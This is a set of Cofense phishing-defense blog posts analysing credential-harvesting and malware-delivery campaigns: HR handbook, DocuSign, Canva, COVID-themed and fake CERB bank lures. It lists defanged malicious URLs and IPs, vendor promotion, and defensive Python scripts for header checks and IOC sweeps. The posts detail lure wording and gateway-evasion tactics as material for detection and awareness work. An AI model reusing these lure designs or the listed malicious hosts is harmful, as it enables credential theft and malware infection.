Mandatory Internal Company Communications: The Best Time to Phish

By Ashley Tran, Cofense Phishing Defense Center

Companies are awash in corporate communications: open enrollment notifications, new policies and so forth. With this crush of mandatory emails being sent out, threat actors get just the right amount of noise in a user’s inbox to slide their own attacks in without heavy scrutiny. They are received as “just another HR email” that users may hastily read, sign and be done with. The Cofense Phishing Defense Center (PDC) has observed a new phishing campaign that aims to harvest Office 365 (O365) credentials by disguising itself as an HR document that must be signed.

Figure 1: Email Body 

The threat actor has attempted to manipulate the “from” fields in the headers of the emails for this campaign. As seen in Figure 1, the threat actor has changed the sender “display name” field to appear as though the email was sent from “Human Resources,” when in reality the real sender’s address can be viewed in the field next to it: [REDACTED]@ntlworld.com. Every email for this campaign originated from a unique sender at this domain, which suggests that the threat actor used compromised accounts to send out this attack.

The subject for this campaign generally followed the theme “Reminder for [User’s Name] Reviewed Employee Handbook,” with the user’s organization email ID inserted into the subject each time. The context of the email is simple: there is a new employee handbook, and everyone must review and sign the acknowledgement of this handbook upon receipt. Interestingly, this phishing email was sent out well past the stated due date, which simply adds to the urgency of the request – or the threat actor overlooked a variable in their template that needed an update.

Within the body of the email, the threat actor has noticeably failed to disguise the URL. In fact, it is clear this supposed handbook is hosted on SharePoint in some way. 

The first step of this attack takes place on a SharePoint-hosted document that users are redirected to from the email itself. This document, as seen in Figure 2, looks similar to any page one may see in an HR handbook, except this one appears to outline the “Remote Working Policy” for the user’s organization. At the end of the described policy there is a hyperlink to “proceed with acknowledgement” which, when hovered over as shown in Figure 3, is simply another redirect to the same SharePoint site, this time to a survey hosted on it.

Figure 2-3: Phishing Page 

Once users click on the link to presumably acknowledge this new policy, they are redirected to an “Acknowledgement Section” seen in Figure 4. On this page, users are prompted to enter their Microsoft credentials as a way to identify themselves, and “for successful submission of acknowledgement.” The threat actor in this case has used the Microsoft Excel web app to create and host a survey to harvest credentials, but this is far from uncommon. In fact, many phish use this method, exploiting the fact that these Excel surveys are hosted on SharePoint and leveraging the trust most users place in the sharepoint.com domain as a whole.

Figure 4: Phishing Page   

Network IOCs and IPs

Network IOC: hXXps://netorgft6696135-my[.]sharepoint[.]com/:w:/g/personal/hr_hrhandboook_com/Efj4moxVJidCogbJKcnVuQUBuhnrbvfNNdoq49e7ztvopQ?e=QpXfQL
IP: 104[.]146[.]136[.]48

Network IOC: hXXps://netorgft6696135-my[.]sharepoint[.]com/:x:/r/personal/hr_hrhandboook_com/_layouts/15/WopiFrame.aspx?guestaccesstoken=EiYjYkpbbdYnGHOdsn0%2fA9ofWLWdjKnx0g5atRlMHTE%3d&docid=1_1c88d073e14d04676b3274b6a31ae8900&wdFormId=%7B72299567%2DF59D%2D40B1%2D8CAA%2D6E6DED3D7529%7D&action=formsubmit
IP: 104[.]146[.]136[.]48

All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks. Any observations contained in this blog regarding circumvention of end point protections are based on observations at a point in time based on a specific set of system configurations. Subsequent updates or different configurations may be effective at stopping these or similar threats.
The Cofense® and PhishMe® names and logos, as well as any other Cofense product or service names or logos displayed on this blog are registered trademarks or trademarks of Cofense Inc.

“We’re Grateful For The Trust!”

By Kian Mahdavi, Cofense Phishing Defense Center

The Cofense Phishing Defense Center (PDC) has found a phishing campaign that aims to harvest users’ credentials by making references to DocuSign. At first glance, the email is kept short and sweet in a bid to lure the user into viewing the invoice. Proofpoint’s and Microsoft’s Secure Email Gateways (SEGs) both detected the campaign but failed to stop it. The success of this attack is attributed to the skillfully concealed, legitimate links within the PDF attachment.

Here’s what happened

Figure 1: Email body 

The subject of this phish is a vague “Invoice attached,” guiding the user to learn more. The sender’s display name is William G. Kern; however, the email address begins with “bill.kern”. Could this be a mistake by the attacker? One would expect the display name and email address to match one another. Panning down, we note the attachment name is purely numerical, with no indication of a particular transaction, which catches the attention of inquisitive users.
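Both the “Human Resources” sender on a consumer domain in the previous post and the “William G. Kern” / “bill.kern” mismatch here are cases where the display name does not fit the actual address. The check below is an added example, not Cofense tooling: it parses a From: header with the standard library and reports when a role-style display name arrives from outside the organization, or when a personal display name shares nothing (or only part of its tokens) with the mailbox name. The organization domains, the role-word list and the sample headers are constructed for this example.

```python
"""Flag From: headers whose display name does not fit the actual address.

Added example; not Cofense code. The organisation domains, role-word list
and sample headers below are constructed for illustration.
"""
import re
from email.utils import parseaddr

# Display-name tokens that imply an internal business function (assumed list).
ROLE_TOKENS = {"hr", "human", "resources", "payroll", "helpdesk", "support", "admin"}


def name_tokens(text):
    """Lower-case alphabetic tokens, with single-letter initials dropped."""
    return {t for t in re.findall(r"[a-z]+", text.lower()) if len(t) > 1}


def check_from_header(from_value, org_domains):
    """Return a list of (severity, message) findings; empty means nothing odd."""
    display, addr = parseaddr(from_value)
    if "@" not in addr:
        return [("high", "From: address could not be parsed")]
    local, domain = addr.rsplit("@", 1)
    domain = domain.lower()
    external = domain not in {d.lower() for d in org_domains}
    display_toks = name_tokens(display)
    findings = []

    # Case 1: a role such as "Human Resources" but sent from outside the org.
    if external and display_toks & ROLE_TOKENS:
        findings.append(("high",
                         f"role display name {display!r} but external sender domain {domain}"))

    # Case 2: a personal name whose tokens do not appear in the mailbox name.
    if display_toks and not display_toks & ROLE_TOKENS:
        local_toks = set(re.findall(r"[a-z]+", local.lower()))
        missing = sorted(display_toks - local_toks)
        if missing and len(missing) == len(display_toks):
            findings.append(("medium",
                             f"display name {display!r} shares nothing with mailbox {local!r}"))
        elif missing:
            findings.append(("low",
                             f"display name token(s) {missing} not in mailbox {local!r}"))
    return findings


def triage(headers, org_domains):
    """Map each From: value to its findings, keeping only the suspicious ones."""
    return {h: f for h in headers if (f := check_from_header(h, org_domains))}


if __name__ == "__main__":
    # Constructed sample headers modelled on the two campaigns above.
    samples = [
        '"Human Resources" <someone@ntlworld.com>',
        '"William G. Kern" <bill.kern@example.net>',
        '"Jane Doe" <jane.doe@example.com>',
    ]
    for header, findings in triage(samples, ["example.com"]).items():
        for severity, message in findings:
            print(f"{severity:6} {header}: {message}")
```

A nickname such as “Bill” for “William” is only a low-severity finding because legitimate mail triggers it too; the high-severity case is the one worth an automatic banner or a Triage rule.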

Following on from the above, the email features just two sentences: the first thanks the user for their “business,” and the second encourages the user to contact the sender by telephone should there be any discrepancies. The norm would be to touch base via email, which gives the attacker full anonymity and leverages their spoofing techniques – a perfect social engineering tactic.

Figure 2 – Attached PDF

The screenshot above displays what the attachment looks like when opened. Behind the “authentication required” message is a document with a substantial amount of text, including two bulky signatures. Perplexed users are led to believe they are a step closer to unveiling the invoice.

It’s important to note the role the subdomain “myemail” plays in this attack: it hosts the initial malicious webpage, rather than the compromised root domain “constantcontact[.]com.” Note the social engineering wording toward the end of the URL below. It’s a troubling yet effective method that attackers use to spread phishing sites.

“hXXps://myemail[.]constantcontact[.]com/The-latest-news-for-you.html?”

Figure 3 – Redirect Malicious DocuSign Link

Upon clicking the hyperlinked “Review” button in Figure 2, the website “myemail[.]constantcontact[.]com” opens in the default browser. Because a legitimate service is used, such campaigns almost certainly pass email authentication checks such as DKIM and SPF. Better still for the attacker, the service’s built-in SSL certificate, shown in the address bar, makes the domain appear “trusted,” presenting the green padlock at the beginning of the URL. It appears the domain had been purchased and hosted through namecheap[.]com, a web-hosting platform.

Figure 4 – Payload Phishing Site

The sequel to this campaign is a somewhat similar “DocuSign” phishing site inviting users to enter their credentials.

A genuine DocuSign request does not require the recipient to log in to an account. The document would be sent via email from dse@docusign[.]net, allowing recipients to review the document, apply a signature and complete the signing process.

Upon logging in, the user is under the impression he or she has been authenticated via a legitimate DocuSign. At this point, the user’s credentials are unfortunately in the hands of the threat actor.

Network IOCs

IPs

hXXps://myemail[.]constantcontact[.]com/The-latest-news-for-you.html

208[.]75[.]122[.]131

hXXps://domainnameonline[.]net/

199[.]188[.]200[.]202


Phish Found in Proofpoint-Protected Environments – Week Ending October 16, 2020

100% of the phish seen by the Cofense Phishing Defense Center® (PDC) have been found in environments protected by Secure Email Gateways (SEGs), were reported by humans, and were automatically analyzed and dispositioned by Cofense Triage.

Cofense solutions enable organizations to identify, analyze, and quarantine email threats in minutes. 

Are phishing emails evading your Proofpoint Secure Email Gateway? The following are examples of phishing emails seen by the Cofense PDC in environments protected by Proofpoint. 

TYPE: Malware, BazarBackdoor

DESCRIPTION: This phishing attack is seen in Proofpoint environments and uses the subject of a termination list to entice recipients to click on a Google Docs link, delivering BazarBackdoor via a PDF link.

TYPE: Remote Access Trojan

DESCRIPTION: This phishing attack is seen in Proofpoint environments and uses a Customer Complaint-themed email and HTML attachment to deliver a Remote Access Trojan.

TYPE: Credential Theft

DESCRIPTION: This phishing attack is seen in Proofpoint environments and uses an overdue invoice themed email to deliver a credential stealer via a PDF attachment.

Malicious emails continue to reach user inboxes, increasing the risk of account compromise, data breach, and ransomware attack. The same patterns and techniques are used week after week.

Recommendations

Cofense recommends that organizations train their personnel to identify and empower them to report these suspicious emails. Cofense PhishMe customers should use SEG Miss templates to raise awareness of these attacks. Organizations should also invest in Cofense Triage and Cofense Vision to quickly analyze and quarantine the phishing attacks that evade Secure Email Gateways.

Interested in seeing more? Search our Real Phishing Threats Database.


Threat Actors Use Canva Templates for Credential Phishing

By Ala Dabat, Cofense Phishing Defense Center

Over the past weeks, the Cofense Phishing Defense Center (PDC) has seen an increase in the number of attackers deploying the Australian design platform Canva in their attempts to trick unwitting recipients into giving up their login credentials for a number of well-known email platforms. Canva lets users design and create graphically driven content such as presentations and other visual content, which has allowed malicious actors to move away from platforms such as Google Docs and Dropbox and harvest sensitive user data through convincing phishing campaigns.

Examples of these attacks vary, although we have seen an increase in the number of malicious PDF files with embedded links that redirect targets to phishing websites hosted on Canva. Canva is in turn used to host image files used as a launch pad, redirecting targets to malicious websites designed to harvest user credentials via cloned landing pages.  

We have noticed that this method of delivery has been employed by hackers to bypass traditional SEG filtering by keeping the content of the email very simple so as to fly under the radar of detection engines. This use of attachments and simply designed phishing emails is nothing new; however, we are seeing an increase in the number of Canva-hosted malicious images employing this method of delivery.

Figure 1: Email with malicious PDF attachment 

The attachment is a malicious PDF file purporting to be from Microsoft, which loads in the recipient’s browser as a local file with an embedded link redirecting the recipient to the malicious Canva image landing page.

Figure 2:  Malicious PDF redirecting targets to Canva hosted malicious image

Once the recipient has clicked on the link, they are redirected to an image hosted on Canva, which includes a link directing to the phishing landing page. Note that as a method of garnering further legitimacy, the image claims to have been scanned by antivirus giving the recipient a further sense of security.   

Figure 3: “OneDrive” landing page hosted on Canva’s design platform 

Once the recipient clicks the link to view the bogus PDF document, they are then redirected to an official looking Microsoft webpage (Figure 4) where they are encouraged to enter sensitive data in order to view the document.  


Figure 4: Redirect to an official looking site purporting to be Microsoft OneDrive for business. 

Aside from attachments the PDC has also seen different variations in the methods of delivery, including phishing emails encouraging recipients to click on a malicious link to view documents; it redirects them to a malicious image hosted on Canva.  

In the figure below, we can see an example phishing email without a malicious attachment.

Figure 5:  A Canva hosted attack with embedded link claiming to be a new ‘Fax Document’ 

Once recipients click the malicious link, like the previous example, they are redirected to a Canva landing page with a malicious image.

Figure 6: Malicious landing page  

Canva is being used by malicious actors as the launchpad for common phishing tactics, applying well known attack vectors and convincing aesthetics for enhanced credibility. 

Figure 7: Multiple email provider login pages for credential harvesting 

In this instance we opted to log in via the bogus Microsoft Outlook login option. Once the recipients have entered their credentials, the credentials are harvested to a database.

Figure 8: Example login page, Microsoft Outlook, with credible aesthetics 

Canva is probably aware of the problem, removing malicious files as and when they’re found, but, as our research has concluded, many of these malicious files have remained on Canva’s hosted platform for hours and even days at a time. Sites such as Google, where hackers have traditionally hosted their phishing content, appear to be a lot faster in detecting and removing it, which is another reason threat actors have begun to exploit the Canva platform.

Indicators of compromise:  

Network IOCs and IPs

Network IOC: hXXps://9812343[.]fls[.]doubleclick[.]net/activityi;src=9812343;type=retar0;cat=flood0;ord=7358195098176
IP: 172[.]217[.]15[.]102

Network IOC: hXXps://www[.]canva[.]com/design/DAEHygBxHno/INiENewnEJagw51VOIkz7w/view
IPs: 104[.]18[.]215[.]67, 104[.]18[.]216[.]67

Network IOC: hXXps://thelivingoodcenter[.]com/cs/office365-RD62/offaccess/
IP: 192[.]249[.]114[.]34

Network IOC: hXXps://www[.]seoera[.]net/7hd7n3ydnbd734/Driveee/Drive/
IP: 192[.]254[.]138[.]161

Network IOC: hXXps://saynodeserve[.]com/cardinal/m/f/
IP: 160[.]153[.]203[.]183
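The IOC sections in these posts are published defanged (hXXps, [.]) and flattened into a “URL IP” layout, sometimes with a second IP on its own row. The script below is an added example, not Cofense tooling: it parses that layout into structured records, refangs the values, and sweeps a constructed proxy log for hits. Full-URL matches are reported ahead of host or IP matches, because a shared platform such as canva.com carries mostly legitimate traffic. The sample table uses two rows from the Canva IOCs above; the proxy log lines are constructed.

```python
"""Parse a defanged IOC table into structured records and sweep proxy logs.

Added example, not Cofense tooling. It handles the flattened "URL  IP"
layout used in the IOC sections of these posts, including a row that carries
only an extra IP for the previous URL. The proxy log lines are constructed.
"""
import ipaddress
import re
from urllib.parse import urlsplit

URL_TOKEN = re.compile(r"h[xX]{2}ps?://\S+")
IP_TOKEN = re.compile(r"\b\d{1,3}(?:\[\.\]\d{1,3}){3}\b")


def refang(token):
    """Undo the defanging used in the tables: hXXp(s) -> http(s), [.] -> '.'."""
    token = re.sub(r"^h[xX]{2}p", "http", token)
    return re.sub(r"[\[\(\{]\.[\]\)\}]", ".", token)


def parse_ioc_table(text):
    """Return [{'url', 'host', 'ips'}] from the defanged table text."""
    entries = []
    for line in text.splitlines():
        urls = URL_TOKEN.findall(line)
        ips = IP_TOKEN.findall(line)
        if urls:
            url = refang(urls[0])
            entries.append({"url": url, "host": urlsplit(url).hostname, "ips": []})
        if ips and entries:  # an IP-only row belongs to the preceding URL
            for ip in ips:
                ip = refang(ip)
                ipaddress.ip_address(ip)  # raises ValueError on a malformed IOC
                entries[-1]["ips"].append(ip)
    return entries


def scan_proxy_log(lines, entries):
    """Match constructed 'ts src dst method url status' lines against the IOCs.

    Returns (line_number, match_kind, ioc_url). A full-URL match is reported
    before a host or IP match because shared platforms such as canva.com or
    sharepoint.com carry mostly legitimate traffic.
    """
    by_url = [e["url"] for e in entries]
    by_host = {e["host"]: e for e in entries}
    by_ip = {ip: e for e in entries for ip in e["ips"]}
    hits = []
    for n, line in enumerate(lines, 1):
        try:
            _ts, _src, dst, _method, url, _status = line.split()
        except ValueError:
            continue  # not in the expected constructed layout
        ioc = next((u for u in by_url if url.startswith(u)), None)
        host = urlsplit(url).hostname
        if ioc:
            hits.append((n, "url", ioc))
        elif host in by_host:
            hits.append((n, "host", by_host[host]["url"]))
        elif dst in by_ip:
            hits.append((n, "ip", by_ip[dst]["url"]))
    return hits


# Two rows copied from the Canva IOC section above, in the flattened layout.
SAMPLE_IOC_TABLE = """\
Network IOCs  IPs
hXXps://www[.]canva[.]com/design/DAEHygBxHno/INiENewnEJagw51VOIkz7w/view  104[.]18[.]215[.]67
104[.]18[.]216[.]67
hXXps://thelivingoodcenter[.]com/cs/office365-RD62/offaccess/  192[.]249[.]114[.]34
"""

# Constructed proxy log: timestamp, client IP, destination IP, method, URL, status.
SAMPLE_PROXY_LOG = [
    "2020-10-12T09:14:02Z 10.0.0.21 104.18.215.67 GET https://www.canva.com/design/DAEHygBxHno/INiENewnEJagw51VOIkz7w/view?utm=1 200",
    "2020-10-12T09:14:40Z 10.0.0.21 192.249.114.34 POST https://thelivingoodcenter.com/cs/office365-RD62/offaccess/login.php 302",
    "2020-10-12T09:15:10Z 10.0.0.35 104.18.216.67 GET https://www.canva.com/ 200",
    "2020-10-12T09:16:00Z 10.0.0.35 93.184.216.34 GET https://example.com/ 200",
]

if __name__ == "__main__":
    iocs = parse_ioc_table(SAMPLE_IOC_TABLE)
    for hit in scan_proxy_log(SAMPLE_PROXY_LOG, iocs):
        print(hit)
```

The third sample line is a plain visit to canva.com and surfaces only as a “host” match; treat such hits as context for the full-URL hits rather than as alerts on their own.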

 

 


Trump COVID-19 Diagnosis Leveraged in Campaigns

By Dylan Duncan and Max Gannon

Threat actors were quick to leverage the news that President Donald Trump tested positive for COVID-19. Cofense Intelligence has observed a recent COVID-19-themed campaign that successfully reached users in enterprise environments. Taking advantage of recent headlines and the upcoming U.S. election, this campaign makes use of secure email gateway (SEG) evasion tactics and anti-analysis techniques to deliver advanced malware to end users protected by leading SEGs. The threat actors targeted multiple industries, reaching users across a variety of sectors in the United States and Europe.

The emails entice recipients by leveraging the president’s health status mere weeks before the election and claiming to provide “secret” information on COVID-19. Threat actors have created multiple phishing emails based on these themes, similar to Figures 1 and 2. 

Figure 1: Phishing email leveraging the president’s medical condition.  

Figure 2: Phishing email leveraging COVID-19. 

Anti-analysis Malware in Secure Environments  

These phishing emails deliver embedded Google Docs URLs that are often permitted by SEGs. The URL leads to a document with another link rather than directly downloading malicious content. While Google is quick to remove directly hosted malware, it is often much slower to remove content that provides a link to malicious content. The Google doc (Figure 3) displays an image of the Google logo with a hyperlink that redirects to a Google wrapped payload URL. This wrapping is important, as threat actors can use it to prevent analysts from downloading malware directly from the threat actor-controlled page. If certain conditions are met, the payload URL then downloads a password-protected XLS file. This password protection ensures that, without access to the original email, any downloaded files are not revealed to reverse engineers. The password-protected Microsoft Excel Worksheet abuses an organization’s reliance on Microsoft Excel macros to download and execute BazarBackdoor or ZLoader once macros are enabled.
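The paragraph above describes a two-hop delivery: a Google Doc that is allowed through, and a Google-wrapped link inside it that leads to the real payload. The script below is an added example, not Cofense code, for analysts handling such a link statically: it peels the wrapper without making any network request and reports whether the final destination is still Google-hosted or an Office file elsewhere. It assumes the wrapper uses the common google.com/url?q=<destination> form (the post only says the link is “Google wrapped”); the sample links and the extension list are constructed.

```python
"""Statically unwrap Google-wrapped links and classify what they lead to.

Added example; not Cofense code. Assumes the wrapper has the common
google.com/url?q=<destination> form. No network requests are made, so it can
run on URLs extracted from a quarantined message. Sample links are constructed.
"""
from urllib.parse import parse_qs, urlsplit

WRAPPER_HOSTS = {"google.com", "www.google.com"}
DOC_HOSTS = {"docs.google.com", "drive.google.com"}
# Extensions worth a closer look when they sit behind a wrapper (assumed list).
OFFICE_EXTENSIONS = (".xls", ".xlsm", ".xlsx", ".doc", ".docm")


def unwrap_google_redirect(url, max_depth=5):
    """Peel google.com/url?q=... wrappers; return (final_url, chain)."""
    chain = [url]
    for _ in range(max_depth):
        parts = urlsplit(url)
        if parts.hostname not in WRAPPER_HOSTS or parts.path != "/url":
            break
        params = parse_qs(parts.query)
        # Both "q" and "url" parameters are seen in the wild; "q" is checked first.
        target = (params.get("q") or params.get("url") or [None])[0]
        if not target:
            break
        url = target
        chain.append(url)
    return url, chain


def classify_link(url):
    """Describe a link the way an analyst triaging the email would."""
    final, chain = unwrap_google_redirect(url)
    parts = urlsplit(final)
    host = parts.hostname or ""
    return {
        "wrapped": len(chain) > 1,
        "final_url": final,
        "google_hosted": host in DOC_HOSTS,
        "office_payload": parts.path.lower().endswith(OFFICE_EXTENSIONS),
    }


if __name__ == "__main__":
    # Constructed samples: a Doc link and a wrapped link to an off-Google workbook.
    samples = [
        "https://docs.google.com/document/d/EXAMPLE_DOC_ID/edit",
        "https://www.google.com/url?q=https://payload.example.invalid/report.xls&sa=D",
    ]
    for s in samples:
        print(s, "->", classify_link(s))
```

The useful signal is the combination: a message whose visible link is Google-hosted but whose unwrapped destination is an Office workbook on an unrelated host matches the chain described above and is a good candidate for detonation rather than a direct download by an analyst.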

The choice between BazarBackdoor or ZLoader is determined by the initial link embedded in the email. Both of these malware families feature extensive anti-analysis functionality. BazarBackdoor is a stealthy malware downloader commonly affiliated with the developers of TrickBot. It uses specialized network communications to avoid detection, and to contact its command and control locations. ZLoader is a banking trojan that uses web injects to steal credentials and sensitive information. 

Figure 3: Google Document from the embedded URLs.

Threat actors continue to adapt phishing campaigns to reflect current-affairs themes, and turn to the tactics, techniques and procedures that yield success in delivering phish to targets in environments protected by SEGs. Once a phishing email successfully reaches an inbox, the human factor is the final defense against compromise. Cofense Intelligence will continue to report on phishing campaigns reaching end users and the tactics, techniques and procedures that evade modern SEGs.


Phish Found in Proofpoint-Protected Environments – Week Ending October 4, 2020

100% of the phish seen by the Cofense Phishing Defense Center® (PDC) have been found in environments protected by Secure Email Gateways (SEGs), were reported by humans, and were automatically analyzed and dispositioned by Cofense Triage.

Cofense solutions enable organizations to identify, analyze, and quarantine email threats in minutes. 

Are phishing emails evading your Proofpoint Secure Email Gateway? The following are examples of phishing emails seen by the Cofense PDC in environments protected by Proofpoint. 

TYPE: Malware, ZLoader 

DESCRIPTION: This phish plays on the sensitive idea of insider details. When a recipient clicks on the Google Docs link, ZLoader is delivered via an Office macro-laden spreadsheet downloaded from an embedded URL.

TYPE: Malware, AZORult Stealer 

DESCRIPTION: This phish relies on the familiarity people have with order confirmations sent through email.  In this case, an Excel document is used to deliver the AZORult Stealer via an embedded URL. 

TYPE: Quaverse Remote Access Trojan 

DESCRIPTION: This is another example of using an order hook to have someone open the order information in a zip file.  This attachment delivers the Quaverse Remote Access Trojan. 

TYPE: Malware, BazarBackdoor

DESCRIPTION: This phish conveys there is important financial information that needs to be viewed.  When the Google Doc is clicked the BazarBackdoor is delivered via embedded URLs. 

TYPE:  Keylogger, Agent Tesla Keylogger 

DESCRIPTION: Another finance-themed phish in Spanish entices the recipient to click on the link where the Agent Tesla Keylogger is delivered via an embedded URL. 

Malicious emails continue to reach user inboxes, increasing the risk of account compromise, data breach, and ransomware attack. The same patterns and techniques are used week after week.

Recommendations

Cofense recommends that organizations train their personnel to identify and empower them to report these suspicious emails. Cofense PhishMe customers should use SEG Miss templates to raise awareness of these attacks. Organizations should also invest in Cofense Triage and Cofense Vision to quickly analyze and quarantine the phishing attacks that evade Secure Email Gateways.

Interested in seeing more? Search our Real Phishing Threats Database.


Phish Found in Environments Protected by Proofpoint, Microsoft, Cisco, Mimecast and Symantec

By Mark Zigadlo, Cofense Phishing Defense Center

The Cofense Phishing Defense Center (PDC) sees tens of thousands of phishing emails that bypass secure email gateways (SEGs) every month. The PDC is an advanced managed detection and response (MDR) service that can remediate these malicious emails from mail environments within minutes.   

A few examples of phishing emails found in environments protected by SEGs can be found here. The ineffectiveness of SEGs continues to increase business risk daily. And the solution is more than high-production-value awareness training modules. You need a combination of people and technology to combat the innovativeness of attackers and quickly reduce or remove the business risk.

Here’s a recent and real story about a phishing campaign (and its quickly morphed successor) that bypassed SEGs from Proofpoint (PFPT), Microsoft (MSFT), Mimecast (MIME), Cisco (CSCO) and Symantec (SYMC).   

The suspicious email below arrived in my inbox. I reported it to the PDC using Cofense Reporter.

Figure 1 – Phishing Email 

I received a response eight minutes later saying the email was malicious (BazarBackdoor malware) and removed from my mailbox. Amazing speed, eight minutes to remove the threat and stop the attack!

Detection

Drilling down further, I saw Cofense’s network effect was in full action in the PDC. The network effect is the unique combination of people and technology that allows one participant in the network to benefit from threats found by another participant in the network. At Cofense, we have over 25 million people contributing to make the network effect an unparalleled security tool. In this case, the PDC had detected similar attacks for 15 other PDC customers (people in the network), which enabled the PDC to respond with lightning speed throughout the day.

Here is the kill chain/timeline for the first customer that received this phishing campaign.

Twelve minutes between the first report and removal of malicious emails from user mailboxes, but the story gets better.   

The PDC uses a key feature of Cofense Vision called Auto Quarantine which looks for new emails matching the ones just identified and quarantined. Over the next 24 minutes, 22 additional emails were detected and removed by Cofense Vision. 

Response & Remediation 

As we know, attackers are constantly innovating to bypass security technology. This is why you need the combination of people and technology to reduce/remove the risk. This case was no different. Two hours after the first phishing campaign was identified and stopped, a slightly modified campaign was launched against the same customer. The PDC jumped back into action again. 

More amazing results. Twenty-two minutes between the first report of the modified campaign and removal of malicious emails from user mailboxes through Cofense’s Phishing Defense Center.

The Phishing Defense Center harnesses phishing intelligence from the frontlines of the world’s most active phishing campaigns to quickly protect everyone in the network. 

To learn how you can efficiently identify and remove phish that have bypassed your SEG, click here for a free demo of the Phishing Defense Center. 


Twelve Flavors of Phish: Canadian Workers Targeted With Fake Covid-19 Relief Deposits

By Jake Longden and Elmer Hernandez, Cofense Phishing Defense Center

Financial aid programs continue to be popular targets in the midst of the COVID-19 pandemic, with government relief grants a particularly great one to exploit.  

The Cofense Phishing Defense Center (PDC) has observed a recent phishing campaign in Canada that aims to harvest banking credentials and other personal information for 12 different banking institutions. This was achieved by preying on employees who were expecting COVID-19 relief grants in the form of the CERB (Canada Emergency Response Benefit). These funds are supposedly sent via an electronic transfer from Interac, a legitimate Canadian interbank network.

With multiple world governments providing such grants, and millions of people relying on these as their main source of sustenance, adversaries will continue exploiting such dependence. 

CERB Deposit

The email purports to be a notification from Interac’s e-transfer service, indicating that the Canada Revenue Agency (CRA) has made a CERB deposit of $1,957.5 CAD (approx. $1,463 USD). A fictitious expiration date is included in an attempt to instill a sense of urgency.

The CERB scheme gives financial support to employed and self-employed Canadians who have been affected by the COVID-19 pandemic. It offers $2,000 CAD (approx. $1,490 USD) for a four-week period.

Figure 1 – Email Body 

Header

The SPF fail in the headers (Figure 2) indicates that the email is likely spoofed, and the IP address suggests that it came from a potentially compromised device on the University of South Florida network (Figure 3). The choice of the name ‘cra-cerb’ in the sender address adds credibility to the email.
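The two header observations above, the SPF verdict and the connecting IP, can be pulled out of a raw message automatically. The script below is an added example, not Cofense tooling: it reads the Authentication-Results header (RFC 8601 layout) for the SPF result and takes the connecting IP from the Received header written by the organization’s own edge MTA, so that the remote-controlled Received lines further down cannot override it. The sample message, host names and addresses are constructed, and the IP is a documentation address rather than the one observed in the campaign.

```python
"""Pull the SPF verdict and connecting IP out of raw message headers.

Added example; not Cofense tooling. Reads Authentication-Results (RFC 8601
layout) and the Received header stamped by our own edge MTA. The sample
message, hostnames, addresses and IP below are constructed.
"""
import re
from email import message_from_string
from email.utils import parseaddr

SPF_RESULT = re.compile(
    r"\bspf=(pass|fail|softfail|neutral|none|temperror|permerror)\b", re.I)
RECEIVED_IP = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")


def spf_verdict(msg):
    """Return the lower-cased SPF result from Authentication-Results, or None."""
    for value in msg.get_all("Authentication-Results", []):
        m = SPF_RESULT.search(value)
        if m:
            return m.group(1).lower()
    return None


def connecting_ip(msg, edge_host):
    """IP of the host that handed the message to our edge MTA (edge_host).

    Only the Received line stamped 'by <edge_host>' is trusted; lines below it
    were written by the sending side and can say anything.
    """
    for value in msg.get_all("Received", []):  # topmost first = last hop
        if f"by {edge_host}" in value:
            m = RECEIVED_IP.search(value)
            if m:
                return m.group(1)
    return None


def assess(raw_message, edge_host):
    """Summarise the header evidence an analyst looks at first."""
    msg = message_from_string(raw_message)
    verdict = spf_verdict(msg)
    _, from_addr = parseaddr(msg.get("From", ""))
    return {
        "spf": verdict,
        "from": from_addr,
        "connecting_ip": connecting_ip(msg, edge_host),
        "likely_spoofed": verdict in {"fail", "softfail"},
    }


# Constructed headers modelled on the campaign above (192.0.2.44 is a
# documentation address; the .invalid names are placeholders).
SAMPLE_HEADERS = """\
Received: from mail-relay.example-university.invalid ([192.0.2.44])
    by mx.example.com with ESMTP; Mon, 12 Oct 2020 09:14:02 +0000
Received: from [10.20.30.40] (unknown [10.20.30.40])
    by mail-relay.example-university.invalid; Mon, 12 Oct 2020 09:13:58 +0000
Authentication-Results: mx.example.com; spf=fail (sender IP is 192.0.2.44)
    smtp.mailfrom=cra-cerb@notify.interac.invalid; dkim=none
From: "Interac e-Transfer" <cra-cerb@notify.interac.invalid>
Subject: INTERAC e-Transfer: CERB deposit
Content-Type: text/plain

(body omitted)
"""

if __name__ == "__main__":
    print(assess(SAMPLE_HEADERS, "mx.example.com"))
```

An SPF fail on its own is not proof of spoofing (forwarding breaks SPF too), which is why the result is paired with the connecting IP: a consumer or university address handing in mail for a financial brand is the combination that supports the “compromised device” reading above.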

Figure 2 – SPF Fail 

Figure 3 – USF IP Address 

A Phish of 12 Different Flavors

The first landing page the phish leads to is an impersonation of the CRA. It has working links in both French and English, like a legitimate site from the Canadian government. Once the user has selected their language, they are redirected to an impersonated Interac e-transfer site in that language.

Figure 4 – CRA Spoofed Site  

Once in the spoofed Interac e-transfer site (Figure 5), the user must choose their personal bank from twelve different options in order to receive the deposit. All of these banks are actual members of the Interac network, which suggests attention to detail from the adversaries:

  • ATB Financial 
  • Bank of Montreal (BMO) 
  • Canadian Imperial Bank of Commerce (CIBC) 
  • Desjardins 
  • Laurentian Bank 
  • Meridian 
  • National Bank of Canada 
  • Royal Bank of Canada (RBC) 
  • Scotiabank 
  • Simplii Financial 
  • Tangerine 
  • TD Canada Trust 

Figure 5 – Spoofed Interac Page 

Next, the recipient is taken through a series of spoofed pages for the corresponding bank, with some offering both English and French versions. All pages reside within the compromised website of a Washington, DC area business. The URL paths vary depending on the bank, but follow this format:

hxxps://lincolnrestaurant-dc[.]com/interca/{unique 32 character string}/bank/{bank name}/{html or php file} 

Although no two options are identical, most of the twelve spoofed banks ask for similar details: 

  • Usernames 
  • Card Numbers 
  • Passwords 
  • Security Questions and Answers 
  • Personal Information (PI) (Full Name, Date of Birth, Email, etc) 

Scotiabank (English) was chosen to showcase an example of the entire phish process. The initial page the user is presented with is a standard login page asking for credentials; notice the slight typo of the word “sign” on the “Sing in” button (Figure 6).

Figure 6 – Scotiabank Sign in 

The next page asks for sensitive PI and card information (Figure 7). The user is then asked for Security questions and answers (Figure 8), which might falsely provide the reassurance that some form of multi-factor authentication is being employed. The combination of PI such as a Social Insurance number, credit card numbers and MFA questions could form a fairly solid base for identity theft/impersonation. Once submitted a final page confirms the funds will be deposited in 48 hours (Figure 9).

Figure 7 – Scotia PI and Card Info 

Figure 8 – Scotia MFA Security Questions 

Figure 9 – Deposit Successful 

